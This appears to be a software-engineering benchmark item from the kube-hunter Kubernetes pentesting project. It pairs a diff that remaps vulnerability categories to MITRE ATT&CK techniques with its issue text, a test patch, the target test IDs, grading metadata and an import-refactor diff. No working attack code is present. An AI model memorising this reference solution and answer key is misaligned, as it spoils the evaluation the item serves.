kube_hunter.modules.discovery.dashboard import KubeDashboardEvent @@ -19,7 +19,7 @@ class DashboardExposed(Vulnerability, Event): self, KubernetesCluster, "Dashboard Exposed", - category=RemoteCodeExec, + category=AccessK8sDashboardTechnique, vid="KHV029", ) self.evidence = "nodes: {}".format(" ".join(nodes)) if nodes else None diff --git a/kube_hunter/modules/hunting/dns.py b/kube_hunter/modules/hunting/dns.py index 6635b37..b0e037b 100644 --- a/kube_hunter/modules/hunting/dns.py +++ b/kube_hunter/modules/hunting/dns.py @@ -6,7 +6,7 @@ from scapy.all import IP, ICMP, UDP, DNS, DNSQR, ARP, Ether, sr1, srp1, srp from kube_hunter.conf import get_config from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, Vulnerability -from kube_hunter.core.types import ActiveHunter, KubernetesCluster, IdentityTheft +from kube_hunter.core.types import ActiveHunter, KubernetesCluster, CoreDNSPoisoningTechnique from kube_hunter.modules.hunting.arp import PossibleArpSpoofing logger = logging.getLogger(__name__) @@ -21,7 +21,7 @@ class PossibleDnsSpoofing(Vulnerability, Event): self, KubernetesCluster, "Possible DNS Spoof", - category=IdentityTheft, + category=CoreDNSPoisoningTechnique, vid="KHV030", ) self.kubedns_pod_ip = kubedns_pod_ip diff --git a/kube_hunter/modules/hunting/etcd.py b/kube_hunter/modules/hunting/etcd.py index 9118bc9..f087567 100644 --- a/kube_hunter/modules/hunting/etcd.py +++ b/kube_hunter/modules/hunting/etcd.py @@ -8,10 +8,10 @@ from kube_hunter.core.types import ( ActiveHunter, Hunter, KubernetesCluster, - InformationDisclosure, - RemoteCodeExec, - UnauthenticatedAccess, - AccessRisk, + GeneralSensitiveInformationTechnique, + GeneralPersistenceTechnique, + ListK8sSecretsTechnique, + ExposedSensitiveInterfacesTechnique, ) logger = logging.getLogger(__name__) @@ -29,7 +29,7 @@ class EtcdRemoteWriteAccessEvent(Vulnerability, Event): self, KubernetesCluster, name="Etcd Remote Write Access Event", - category=RemoteCodeExec, + 
category=GeneralPersistenceTechnique, vid="KHV031", ) self.evidence = write_res @@ -43,7 +43,7 @@ class EtcdRemoteReadAccessEvent(Vulnerability, Event): self, KubernetesCluster, name="Etcd Remote Read Access Event", - category=AccessRisk, + category=ListK8sSecretsTechnique, vid="KHV032", ) self.evidence = keys @@ -58,7 +58,7 @@ class EtcdRemoteVersionDisclosureEvent(Vulnerability, Event): self, KubernetesCluster, name="Etcd Remote version disclosure", - category=InformationDisclosure, + category=GeneralSensitiveInformationTechnique, vid="KHV033", ) self.evidence = version @@ -74,7 +74,7 @@ class EtcdAccessEnabledWithoutAuthEvent(Vulnerability, Event): self, KubernetesCluster, name="Etcd is accessible using insecure connection (HTTP)", - category=UnauthenticatedAccess, + category=ExposedSensitiveInterfacesTechnique, vid="KHV034", ) self.evidence = version diff --git a/kube_hunter/modules/hunting/kubelet.py b/kube_hunter/modules/hunting/kubelet.py index 3ff85b8..c67336c 100644 --- a/kube_hunter/modules/hunting/kubelet.py +++ b/kube_hunter/modules/hunting/kubelet.py @@ -16,9 +16,12 @@ from kube_hunter.core.types import ( ActiveHunter, KubernetesCluster, Kubelet, - InformationDisclosure, - RemoteCodeExec, - AccessRisk, + ExposedSensitiveInterfacesTechnique, + ExecIntoContainerTechnique, + GeneralDefenseEvasionTechnique, + GeneralSensitiveInformationTechnique, + PrivilegedContainerTechnique, + AccessKubeletAPITechnique, ) from kube_hunter.modules.discovery.kubelet import ( ReadOnlyKubeletEvent, @@ -35,7 +38,7 @@ class ExposedPodsHandler(Vulnerability, Event): def __init__(self, pods): Vulnerability.__init__( - self, component=Kubelet, name="Exposed Pods", category=InformationDisclosure, vid="KHV052" + self, component=Kubelet, name="Exposed Pods", category=AccessKubeletAPITechnique, vid="KHV052" ) self.pods = pods self.evidence = f"count: {len(self.pods)}" @@ -50,7 +53,7 @@ class AnonymousAuthEnabled(Vulnerability, Event): self, component=Kubelet, name="Anonymous 
Authentication", - category=RemoteCodeExec, + category=ExposedSensitiveInterfacesTechnique, vid="KHV036", ) @@ -63,7 +66,7 @@ class ExposedContainerLogsHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Container Logs", - category=InformationDisclosure, + category=AccessKubeletAPITechnique, vid="KHV037", ) @@ -77,7 +80,7 @@ class ExposedRunningPodsHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Running Pods", - category=InformationDisclosure, + category=AccessKubeletAPITechnique, vid="KHV038", ) self.count = count @@ -92,7 +95,7 @@ class ExposedExecHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Exec On Container", - category=RemoteCodeExec, + category=ExecIntoContainerTechnique, vid="KHV039", ) @@ -105,7 +108,7 @@ class ExposedRunHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Run Inside Container", - category=RemoteCodeExec, + category=ExecIntoContainerTechnique, vid="KHV040", ) @@ -118,7 +121,7 @@ class ExposedPortForwardHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Port Forward", - category=RemoteCodeExec, + category=GeneralDefenseEvasionTechnique, vid="KHV041", ) @@ -132,7 +135,7 @@ class ExposedAttachHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Attaching To Container", - category=RemoteCodeExec, + category=ExecIntoContainerTechnique, vid="KHV042", ) @@ -146,7 +149,7 @@ class ExposedHealthzHandler(Vulnerability, Event): self, component=Kubelet, name="Cluster Health Disclosure", - category=InformationDisclosure, + category=GeneralSensitiveInformationTechnique, vid="KHV043", ) self.status = status @@ -163,7 +166,7 @@ the whole cluster""" self, component=KubernetesCluster, name="Exposed Existing Privileged Container(s) Via Secure Kubelet Port", - category=AccessRisk, + category=PrivilegedContainerTechnique, vid="KHV051", ) self.exposed_existing_privileged_containers = exposed_existing_privileged_containers @@ -178,7 +181,7 @@ class 
PrivilegedContainers(Vulnerability, Event): self, component=KubernetesCluster, name="Privileged Container", - category=AccessRisk, + category=PrivilegedContainerTechnique, vid="KHV044", ) self.containers = containers @@ -193,7 +196,7 @@ class ExposedSystemLogs(Vulnerability, Event): self, component=Kubelet, name="Exposed System Logs", - category=InformationDisclosure, + category=AccessKubeletAPITechnique, vid="KHV045", ) @@ -206,7 +209,7 @@ class ExposedKubeletCmdline(Vulnerability, Event): self, component=Kubelet, name="Exposed Kubelet Cmdline", - category=InformationDisclosure, + category=AccessKubeletAPITechnique, vid="KHV046", ) self.cmdline = cmdline diff --git a/kube_hunter/modules/hunting/mounts.py b/kube_hunter/modules/hunting/mounts.py index 6120f59..8eb42d7 100644 --- a/kube_hunter/modules/hunting/mounts.py +++ b/kube_hunter/modules/hunting/mounts.py @@ -5,12 +5,7 @@ import uuid from kube_hunter.conf import get_config from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, Vulnerability -from kube_hunter.core.types import ( - ActiveHunter, - Hunter, - KubernetesCluster, - PrivilegeEscalation, -) +from kube_hunter.core.types import ActiveHunter, Hunter, KubernetesCluster, HostPathMountPrivilegeEscalationTechnique from kube_hunter.modules.hunting.kubelet import ( ExposedPodsHandler, ExposedRunHandler, @@ -28,7 +23,7 @@ class WriteMountToVarLog(Vulnerability, Event): self, KubernetesCluster, "Pod With Mount To /var/log", - category=PrivilegeEscalation, + category=HostPathMountPrivilegeEscalationTechnique, vid="KHV047", ) self.pods = pods @@ -44,7 +39,7 @@ class DirectoryTraversalWithKubelet(Vulnerability, Event): self, KubernetesCluster, "Root Traversal Read On The Kubelet", - category=PrivilegeEscalation, + category=HostPathMountPrivilegeEscalationTechnique, ) self.output = output self.evidence = f"output: {self.output}" diff --git a/kube_hunter/modules/hunting/proxy.py b/kube_hunter/modules/hunting/proxy.py index 
4f5a7af..0570d3d 100644 --- a/kube_hunter/modules/hunting/proxy.py +++ b/kube_hunter/modules/hunting/proxy.py @@ -10,7 +10,7 @@ from kube_hunter.core.types import ( ActiveHunter, Hunter, KubernetesCluster, - InformationDisclosure, + ConnectFromProxyServerTechnique, ) from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent from kube_hunter.modules.discovery.proxy import KubeProxyEvent @@ -26,7 +26,7 @@ class KubeProxyExposed(Vulnerability, Event): self, KubernetesCluster, "Proxy Exposed", - category=InformationDisclosure, + category=ConnectFromProxyServerTechnique, vid="KHV049", ) @@ -123,5 +123,6 @@ class K8sVersionDisclosureProve(ActiveHunter): version=version_metadata["gitVersion"], from_endpoint="/version", extra_info="on kube-proxy", + category=ConnectFromProxyServerTechnique, ) ) diff --git a/kube_hunter/modules/hunting/secrets.py b/kube_hunter/modules/hunting/secrets.py index b505e32..36e09d7 100644 --- a/kube_hunter/modules/hunting/secrets.py +++ b/kube_hunter/modules/hunting/secrets.py @@ -3,7 +3,7 @@ import os from kube_hunter.core.events import handler from kube_hunter.core.events.types import Vulnerability, Event -from kube_hunter.core.types import Hunter, KubernetesCluster, AccessRisk +from kube_hunter.core.types import Hunter, KubernetesCluster, AccessContainerServiceAccountTechnique from kube_hunter.modules.discovery.hosts import RunningAsPodEvent logger = logging.getLogger(__name__) @@ -17,7 +17,7 @@ class ServiceAccountTokenAccess(Vulnerability, Event): self, KubernetesCluster, name="Read access to pod's service account token", - category=AccessRisk, + category=AccessContainerServiceAccountTechnique, vid="KHV050", ) self.evidence = evidence @@ -31,7 +31,7 @@ class SecretsAccess(Vulnerability, Event): self, component=KubernetesCluster, name="Access to pod's secrets", - category=AccessRisk, + category=AccessContainerServiceAccountTechnique, ) self.evidence = evidence diff --git a/kube_hunter/modules/report/base.py 
b/kube_hunter/modules/report/base.py index d8fed44..3382c35 100644 --- a/kube_hunter/modules/report/base.py +++ b/kube_hunter/modules/report/base.py @@ -36,7 +36,7 @@ class BaseReporter: { "location": vuln.location(), "vid": vuln.get_vid(), - "category": vuln.category.name, + "category": vuln.category.get_name(), "severity": vuln.get_severity(), "vulnerability": vuln.get_name(), "description": vuln.explain(), diff --git a/kube_hunter/modules/report/plain.py b/kube_hunter/modules/report/plain.py index b2eb573..913929c 100644 --- a/kube_hunter/modules/report/plain.py +++ b/kube_hunter/modules/report/plain.py @@ -83,7 +83,7 @@ class PlainReporter(BaseReporter): column_names = [ "ID", "Location", - "Category", + "MITRE Category", "Vulnerability", "Description", "Evidence", @@ -91,7 +91,7 @@ class PlainReporter(BaseReporter): vuln_table = PrettyTable(column_names, hrules=ALL) vuln_table.align = "l" vuln_table.max_width = MAX_TABLE_WIDTH - vuln_table.sortby = "Category" + vuln_table.sortby = "MITRE Category" vuln_table.reversesort = True vuln_table.padding_width = 1 vuln_table.header_style = "upper" @@ -101,10 +101,11 @@ class PlainReporter(BaseReporter): evidence = str(vuln.evidence) if len(evidence) > EVIDENCE_PREVIEW: evidence = evidence[:EVIDENCE_PREVIEW] + "..." + row = [ vuln.get_vid(), vuln.location(), - vuln.category.name, + vuln.category.get_name(), vuln.get_name(), vuln.explain(), evidence,
Feature: Changed vulnerability categories to support MITRE ATT&CK ## Description kube-hunter was one of the first projects that offered a Pentesting solution for kubernetes. This arose a lot of new problems as this field of "hacking" kubernetes was at it's really early stages, so we had room for innovative new ideas. We decided then to categorize kube-hunter's innovative techniques with a simple category system: ```bash InformationDisclosure DenialOfService RemoteCodeExec IdentityTheft PrivilegeEscalation AccessRisk UnauthenticatedAccess ``` Time passed and new tools and blogs were published around the kuberentes security world. A new [MITRE ATT&CK matrix ](https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/) was published for kubernetes environments. which did a pretty good job of covering the techniques (mostly already implemented in kube-hunter) used while hacking a kubernetes environment. We know a good category system when we see it, So we decided to move for that system. ### Code changes * A bit of package architecture redesign of the `core.types` sub package * Created a new module `core.types.categories` which defines new categories implemented for this change * new class `MITRECategory` -> base class for all mitre categories * new class `CVECategory` -> All cve vulnerabilities are not part of the new category system. so they will inherit from this base class For every part of the threat matrix, we have a python class. #### Example CAP_NET_RAW is enabled inside a pod. 
The vulnerability object now looks like this: ```python class CapNetRawEnabled(Event, Vulnerability): def __init__(self): Vulnerability.__init__( self, KubernetesCluster, name="CAP_NET_RAW Enabled", category=ARPPoisoningTechnique, ) ``` let's take a look at: `ARPPoisoningTechnique` it inherits from `LateralMovementCategory` which inherits from `MITRECategory` Because of the class method implemented inside `MITRECategory` we can now do something like this: ``` >> ARPPoisoningTechnique.get_name() "Lateral Movement // ARP poisoning and IP spoofing" >> # Automatically discovers the MITRE father category, and returns a full representation of the technique cube in the matrix ``` ### BEFORE ```bash +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ | ID | LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE | +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ | KHV030 | Local to Pod (kube- | Identity Theft | Possible DNS Spoof | A malicious pod | kube-dns at: | | | hunter-2krcf) | | | running on the | 172.17.0.3 | | | | | | cluster could | | | | | | | potentially run a | | | | | | | DNS Spoof attack | | | | | | | and perform a | | | | | | | MITM attack on | | | | | | | applications running | | | | | | | in the cluster. 
| | +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ ``` ### AFTER ```bash +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ | ID | LOCATION | MITRE CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE | +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ | KHV030 | Local to Pod (kube- | Lateral Movement // | Possible DNS Spoof | A malicious pod | kube-dns at: | | | hunter-2krcf) | CoreDNS poisoning | | running on the | 172.17.0.3 | | | | | | cluster could | | | | | | | potentially run a | | | | | | | DNS Spoof attack | | | | | | | and perform a | | | | | | | MITM attack on | | | | | | | applications running | | | | | | | in the cluster. | | +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ ``` ## Contribution checklist - [x] I have read the Contributing Guidelines. - [ ] The commits refer to an active issue in the repository. - [x] I have added automated testing to cover this case.
**Title** Align vulnerability categories with MITRE ATT&CK and CVE classifications **Problem** The tool still used a legacy set of generic categories that did not reflect the MITRE ATT&CK matrix or CVE‑specific groupings, leading to ambiguous reporting and incorrect severity assignments. The plain‑text reporter also displayed only the raw category name, missing the full MITRE technique hierarchy. **Root Cause** Category definitions and severity mapping were hard‑coded to the old enumeration, and the reporting layer accessed a simple name attribute instead of a descriptive identifier. **Fix / Expected Behavior** - Introduce a structured hierarchy for MITRE ATT&CK techniques and a separate hierarchy for CVE‑based categories. - Update all vulnerability classes to reference the appropriate new technique or CVE category. - Refresh the severity lookup to use the new category classes. - Adjust the reporting logic to display the full MITRE technique name (category // technique). - Minor documentation formatting tweak for consistency. **Risk & Validation** - Verify that every vulnerability now reports a MITRE or CVE category and that severity values match the updated mapping. - Run the full test suite and confirm that the plain‑text report sorts and displays the “MITRE Category” column correctly. - Perform manual scans of common clusters to ensure no regression in detection or event publishing.
474
aquasecurity/kube-hunter
diff --git a/tests/hunting/test_apiserver_hunter.py b/tests/hunting/test_apiserver_hunter.py index 7cd6b20..774d485 100644 --- a/tests/hunting/test_apiserver_hunter.py +++ b/tests/hunting/test_apiserver_hunter.py @@ -1,4 +1,5 @@ # flake8: noqa: E402 +from kube_hunter.core.types.vulnerabilities import AccessK8sApiServerTechnique import requests_mock import time @@ -21,7 +22,7 @@ from kube_hunter.modules.hunting.apiserver import ( from kube_hunter.modules.hunting.apiserver import ApiServerPassiveHunterFinished from kube_hunter.modules.hunting.apiserver import CreateANamespace, DeleteANamespace from kube_hunter.modules.discovery.apiserver import ApiServer -from kube_hunter.core.types import UnauthenticatedAccess, InformationDisclosure +from kube_hunter.core.types import ExposedSensitiveInterfacesTechnique, AccessK8sApiServerTechnique from kube_hunter.core.events import handler counter = 0 @@ -181,10 +182,10 @@ class test_ListClusterRoles: class test_ServerApiAccess: def __init__(self, event): print("ServerApiAccess") - if event.category == UnauthenticatedAccess: + if event.category == ExposedSensitiveInterfacesTechnique: assert event.auth_token is None else: - assert event.category == InformationDisclosure + assert event.category == AccessK8sApiServerTechnique assert event.auth_token == "so-secret" global counter counter += 1
[ "tests/hunting/test_apiserver_hunter.py::test_ApiServerToken", "tests/hunting/test_apiserver_hunter.py::test_AccessApiServer", "tests/hunting/test_apiserver_hunter.py::test_AccessApiServerActive" ]
[]
Class: ExposedSensitiveInterfacesTechnique Location: kube_hunter.core.types.vulnerabilities Inputs: None (instantiated implicitly as a class reference; inherits from InitialAccessCategory → MITRECategory) Outputs: Used as a category identifier; supports identity comparison (`event.category == ExposedSensitiveInterfacesTechnique`) and inherits `MITRECategory.get_name()` for full MITRE name representation. Description: Represents the MITRE ATT&CK “Exposed sensitive interfaces” technique (Initial Access) and is used to tag vulnerabilities that expose unauthenticated interfaces. Class: AccessK8sApiServerTechnique Location: kube_hunter.core.types.vulnerabilities Inputs: None (instantiated implicitly as a class reference; inherits from DiscoveryCategory → MITRECategory) Outputs: Used as a category identifier; supports identity comparison (`event.category == AccessK8sApiServerTechnique`) and inherits `MITRECategory.get_name()` for full MITRE name representation. Description: Represents the MITRE ATT&CK “Access the K8S API Server” technique (Discovery) and is used to tag vulnerabilities that involve authenticated access to the Kubernetes API server.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -r requirements-dev.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/hunting/test_apiserver_hunter.py" }
{ "num_modified_files": 22, "num_modified_lines": 405, "pr_author": "danielsagi", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [ "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue introduces MITRE ATT&CK based vulnerability categories, refactors the core type system, and updates all modules to use the new category classes. The provided test patch checks that the API server hunting module now uses the new categories, and the repository changes include the required classes and imports, so the tests align with the stated requirements. No signals of B‑category problems (no external dependencies, implicit naming, or ambiguous specs) are present. 
Therefore the task is clearly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
9ce385a19071ea2e639419ba87c14bd18d0faa93
2022-05-11 13:51:43
CLAassistant: [![CLA assistant check](https://cla-assistant.io/pull/badge/not_signed)](https://cla-assistant.io/aquasecurity/kube-hunter?pullRequest=504) <br/>Thank you for your submission! We really appreciate it. Like many open source projects, we ask that you sign our [Contributor License Agreement](https://cla-assistant.io/aquasecurity/kube-hunter?pullRequest=504) before we can accept your contribution.<br/><sub>You have signed the CLA already but the status is still pending? Let us [recheck](https://cla-assistant.io/check/aquasecurity/kube-hunter?pullRequest=504) it.</sub>
aquasecurity__kube-hunter-504
diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index 54b4bce..747f8cd 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -39,7 +39,7 @@ jobs: password: ${{ secrets.ECR_SECRET_ACCESS_KEY }} - name: Get version id: get_version - uses: crazy-max/ghaction-docker-meta@v1 + uses: crazy-max/ghaction-docker-meta@v3 with: images: ${{ env.REP }} tag-semver: | diff --git a/job.yaml b/job.yaml index 2d9e50f..84ce485 100644 --- a/job.yaml +++ b/job.yaml @@ -5,11 +5,13 @@ metadata: name: kube-hunter spec: template: + metadata: + labels: + app: kube-hunter spec: containers: - name: kube-hunter - image: aquasec/kube-hunter + image: aquasec/kube-hunter:v0.6.7 command: ["kube-hunter"] args: ["--pod"] restartPolicy: Never - backoffLimit: 4 diff --git a/kube_hunter/README.md b/kube_hunter/README.md index 8c4b70f..de5fa0c 100644 --- a/kube_hunter/README.md +++ b/kube_hunter/README.md @@ -76,7 +76,7 @@ in order to prevent circular dependency bug. Following the above example, let's figure out the imports: ```python from kube_hunter.core.types import Hunter -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import OpenPortEvent @@ -206,7 +206,7 @@ __Make sure to return the event from the execute method, or the event will not g For example, if you don't want to hunt services found on a localhost IP, you can create the following module, in the `kube_hunter/modules/report/` ```python -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Service, EventFilterBase @handler.subscribe(Service) @@ -222,7 +222,7 @@ That means other Hunters that are subscribed to this Service will not get trigge That opens up a wide variety of possible operations, as this not only can __filter out__ events, but you can actually __change event attributes__, for example: ```python 
-from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.types import InformationDisclosure from kube_hunter.core.events.types import Vulnerability, EventFilterBase diff --git a/kube_hunter/__main__.py b/kube_hunter/__main__.py index 9fda820..e091663 100755 --- a/kube_hunter/__main__.py +++ b/kube_hunter/__main__.py @@ -39,7 +39,7 @@ set_config(config) # Running all other registered plugins before execution pm.hook.load_plugin(args=args) -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import HuntFinished, HuntStarted from kube_hunter.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent from kube_hunter.modules.report import get_reporter, get_dispatcher diff --git a/kube_hunter/core/events/__init__.py b/kube_hunter/core/events/__init__.py index 8f98709..a8c20ab 100644 --- a/kube_hunter/core/events/__init__.py +++ b/kube_hunter/core/events/__init__.py @@ -1,3 +1,2 @@ # flake8: noqa: E402 -from .handler import EventQueue, handler from . import types diff --git a/kube_hunter/core/events/handler.py b/kube_hunter/core/events/event_handler.py similarity index 100% rename from kube_hunter/core/events/handler.py rename to kube_hunter/core/events/event_handler.py diff --git a/kube_hunter/core/types/hunters.py b/kube_hunter/core/types/hunters.py index 0d7e410..ede3c13 100644 --- a/kube_hunter/core/types/hunters.py +++ b/kube_hunter/core/types/hunters.py @@ -19,7 +19,7 @@ class HunterBase: def publish_event(self, event): # Import here to avoid circular import from events package. 
# imports are cached in python so this should not affect runtime - from ..events import handler # noqa + from ..events.event_handler import handler # noqa handler.publish_event(event, caller=self) diff --git a/kube_hunter/modules/discovery/apiserver.py b/kube_hunter/modules/discovery/apiserver.py index af9f4e1..729a55d 100644 --- a/kube_hunter/modules/discovery/apiserver.py +++ b/kube_hunter/modules/discovery/apiserver.py @@ -2,7 +2,7 @@ import logging import requests from kube_hunter.core.types import Discovery -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import OpenPortEvent, Service, Event, EventFilterBase from kube_hunter.conf import get_config diff --git a/kube_hunter/modules/discovery/dashboard.py b/kube_hunter/modules/discovery/dashboard.py index ac7e610..bdbc400 100644 --- a/kube_hunter/modules/discovery/dashboard.py +++ b/kube_hunter/modules/discovery/dashboard.py @@ -3,7 +3,7 @@ import logging import requests from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, OpenPortEvent, Service from kube_hunter.core.types import Discovery diff --git a/kube_hunter/modules/discovery/etcd.py b/kube_hunter/modules/discovery/etcd.py index 291e09b..d96d396 100644 --- a/kube_hunter/modules/discovery/etcd.py +++ b/kube_hunter/modules/discovery/etcd.py @@ -1,4 +1,4 @@ -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, OpenPortEvent, Service from kube_hunter.core.types import Discovery diff --git a/kube_hunter/modules/discovery/hosts.py b/kube_hunter/modules/discovery/hosts.py index 760211e..86c4a48 100644 --- a/kube_hunter/modules/discovery/hosts.py +++ b/kube_hunter/modules/discovery/hosts.py @@ -9,7 +9,7 @@ from netifaces import AF_INET, 
ifaddresses, interfaces, gateways from kube_hunter.conf import get_config from kube_hunter.modules.discovery.kubernetes_client import list_all_k8s_cluster_nodes -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, NewHostEvent, Vulnerability from kube_hunter.core.types import Discovery, AWS, Azure, InstanceMetadataApiTechnique diff --git a/kube_hunter/modules/discovery/kubectl.py b/kube_hunter/modules/discovery/kubectl.py index 5415b1c..38e52e0 100644 --- a/kube_hunter/modules/discovery/kubectl.py +++ b/kube_hunter/modules/discovery/kubectl.py @@ -2,7 +2,7 @@ import logging import subprocess from kube_hunter.core.types import Discovery -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import HuntStarted, Event logger = logging.getLogger(__name__) diff --git a/kube_hunter/modules/discovery/kubelet.py b/kube_hunter/modules/discovery/kubelet.py index 9b9ac1a..e790899 100644 --- a/kube_hunter/modules/discovery/kubelet.py +++ b/kube_hunter/modules/discovery/kubelet.py @@ -5,7 +5,7 @@ from enum import Enum from kube_hunter.conf import get_config from kube_hunter.core.types import Discovery -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import OpenPortEvent, Event, Service urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) diff --git a/kube_hunter/modules/discovery/ports.py b/kube_hunter/modules/discovery/ports.py index c1c355e..db128c9 100644 --- a/kube_hunter/modules/discovery/ports.py +++ b/kube_hunter/modules/discovery/ports.py @@ -2,7 +2,7 @@ import logging from socket import socket from kube_hunter.core.types import Discovery -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import 
NewHostEvent, OpenPortEvent logger = logging.getLogger(__name__) diff --git a/kube_hunter/modules/discovery/proxy.py b/kube_hunter/modules/discovery/proxy.py index 1b595a4..8394b83 100644 --- a/kube_hunter/modules/discovery/proxy.py +++ b/kube_hunter/modules/discovery/proxy.py @@ -3,7 +3,7 @@ import requests from kube_hunter.conf import get_config from kube_hunter.core.types import Discovery -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Service, Event, OpenPortEvent logger = logging.getLogger(__name__) diff --git a/kube_hunter/modules/hunting/aks.py b/kube_hunter/modules/hunting/aks.py index 6c0d0a9..a0cf9f5 100644 --- a/kube_hunter/modules/hunting/aks.py +++ b/kube_hunter/modules/hunting/aks.py @@ -5,7 +5,7 @@ import requests from kube_hunter.conf import get_config from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler, SecureKubeletPortHunter -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, Vulnerability from kube_hunter.core.types import Hunter, ActiveHunter, MountServicePrincipalTechnique, Azure diff --git a/kube_hunter/modules/hunting/apiserver.py b/kube_hunter/modules/hunting/apiserver.py index 8af3dd8..2096678 100644 --- a/kube_hunter/modules/hunting/apiserver.py +++ b/kube_hunter/modules/hunting/apiserver.py @@ -5,7 +5,7 @@ import requests from kube_hunter.conf import get_config from kube_hunter.modules.discovery.apiserver import ApiServer -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure from kube_hunter.core.types import Hunter, ActiveHunter, KubernetesCluster from kube_hunter.core.types.vulnerabilities import ( diff --git a/kube_hunter/modules/hunting/capabilities.py 
b/kube_hunter/modules/hunting/capabilities.py index 656618b..c1ca7d6 100644 --- a/kube_hunter/modules/hunting/capabilities.py +++ b/kube_hunter/modules/hunting/capabilities.py @@ -2,7 +2,7 @@ import socket import logging from kube_hunter.modules.discovery.hosts import RunningAsPodEvent -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, Vulnerability from kube_hunter.core.types import Hunter, ARPPoisoningTechnique, KubernetesCluster diff --git a/kube_hunter/modules/hunting/certificates.py b/kube_hunter/modules/hunting/certificates.py index ee60c98..fa8397b 100644 --- a/kube_hunter/modules/hunting/certificates.py +++ b/kube_hunter/modules/hunting/certificates.py @@ -4,7 +4,7 @@ import base64 import re from kube_hunter.core.types import Hunter, KubernetesCluster, GeneralSensitiveInformationTechnique -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event, Service logger = logging.getLogger(__name__) diff --git a/kube_hunter/modules/hunting/cves.py b/kube_hunter/modules/hunting/cves.py index b0740a3..137a370 100644 --- a/kube_hunter/modules/hunting/cves.py +++ b/kube_hunter/modules/hunting/cves.py @@ -2,7 +2,7 @@ import logging from packaging import version from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import K8sVersionDisclosure, Vulnerability, Event from kube_hunter.core.types import ( diff --git a/kube_hunter/modules/hunting/dashboard.py b/kube_hunter/modules/hunting/dashboard.py index 956e120..445b8cb 100644 --- a/kube_hunter/modules/hunting/dashboard.py +++ b/kube_hunter/modules/hunting/dashboard.py @@ -4,7 +4,7 @@ import requests from kube_hunter.conf import get_config from kube_hunter.core.types import Hunter, 
